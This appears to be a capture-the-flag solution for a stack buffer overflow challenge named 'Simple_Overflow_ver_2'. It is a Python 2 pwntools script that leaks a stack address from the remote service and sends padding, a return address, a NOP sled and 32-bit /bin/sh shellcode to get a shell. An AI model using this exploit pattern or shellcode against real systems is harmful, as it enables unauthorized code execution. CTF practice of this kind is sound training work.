Simple_Overflow_ver_2

Simple_Overflow_ver_2

nc ctf.j0n9hyun.xyz 6982

from pwn import *
context.log_level = 'debug'

p = remote("ctf.j0n9hyun.xyz", 6982)
pause()
print p.recv(2048)
p.sendline("0")
esp = int( p.recv(10), 16)+144
print p.recv(2048)
p.sendline("y")
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"

payload = "\x00" 
payload += "a" * 139
payload += p32(esp)
payload += "\x90" * 100
payload += shellcode

p.sendline(payload)

p.interactive()

​